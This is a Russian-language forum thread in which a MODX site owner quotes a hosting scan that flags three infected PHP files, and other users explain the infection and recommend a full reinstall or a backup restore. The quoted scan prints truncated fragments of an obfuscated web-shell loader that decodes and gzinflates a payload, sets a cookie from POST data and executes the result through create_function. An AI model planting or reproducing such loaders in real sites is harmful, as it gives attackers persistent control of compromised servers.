Здравствуйте! Сайт работает на MODX Revolution 2.6.5-pl Хостер жалуется на следующее: Внимание, тревога! На вашем сайте обнаружены подозрительные файлы. Спойлер: Спойлер — www/assets/components/xpoller/js/mgr/sections/license.php заражен ...for($wp___=0;$wp___if($wp__=gzinflate($wp__)){if(isset($_POST['wp_']))setcookie('wp_',$_POST['wp_']);$wp___=create_function('',$wp__);u — www/assets/components/tickets/js/mgr/ticket/renew.php заражен ...15587;$l____WP++){$l___WP[$l____WP]=chr((ord($l___WP[$l____WP])-ord($l__WP[$l____WP]))%256);$l__WP.=$l___WP[$l____WP];} @!!!>if($l___WP=gzinflate($l___WP)){if(isset($_POST['l__WP']))setcookie('l__WP',$_POST['l__WP']);$l____WP=create_function — www/assets/components/tickets/class.php заражен ...95;$g____wp++){$g___wp[$g____wp]=chr((ord($g___wp[$g____wp])-ord($g__wp[$g____wp]))%256);$g__wp.=$g___wp[$g____wp];}if( @!!!>$g___wp=gzinflate($g___wp)){$g____wp=create_function('',$g___wp);unset($g___wp,$g__wp);$g____wp();}}header(«Status: А также вчера: Спойлер: Спойлер-2 [www/assets/components/tickets/js/mgr/ticket/renew.php] => ...15587;$l____WP++){$l___WP[$l____WP]=chr((ord($l___WP[$l____WP])-ord($l__WP[$l____WP]))%256);$l__WP.=$l___WP[$l____WP];} @!!!>if($l___WP=gzinflate($l___WP)){if(isset($_POST['l__WP']))setcookie('l__WP',$_POST['l__WP']);$l____WP=create_function [www/assets/components/tickets/class.php] => ...95;$g____wp++){$g___wp[$g____wp]=chr((ord($g___wp[$g____wp])-ord($g__wp[$g____wp]))%256);$g__wp.=$g___wp[$g____wp];}if( @!!!>$g___wp=gzinflate($g___wp)){$g____wp=create_function('',$g___wp);unset($g___wp,$g__wp);$g____wp();}}header("Status: [www/assets/components/xpoller/js/mgr/sections/license.php] => ...for($wp___=0;$wp___<15587;$wp___++){$wp__[$wp___]=chr((ord($wp__[$wp___])-ord($wp_[$wp___]))%256);$wp_.=$wp__[$wp___];} @!!!>if($wp__=gzinflate($wp__)){if(isset($_POST['wp_']))setcookie('wp_',$_POST['wp_']);$wp___=create_function('',$wp__);u Насколько все серьезно? И может ли кто-то помочь в чистке сайта и закрытии уязвимости?
это веб-шелл, используется в процессе автоматического заражения уязвимых сайтов с помощью ботов, а потом для монетизации взломанного сайта на чёрном рынке. ваши персональные данные из БД никому не нужны, злоумышленников интересуют только редиректы, ссылки на левые ресурсы и т.п. я могу. но 2.6.5-pl это последняя версия, в которой закрыты 2 критические уязвимости. как так получилось? обновили движок до последней версии? в таком случае, вирусы выжили.
дыг если уровень пользователя, то только обновляют и все))) а надо сносить ВСЕ файлы и ставить с нуля. лишь потом накатывать контент и шаблоны... ну или бекап разворачивать, если он есть с датой до 11 июля. вирусы сидят в том числе и в файлах, которые обновлением абсолютно не затрагиваются!
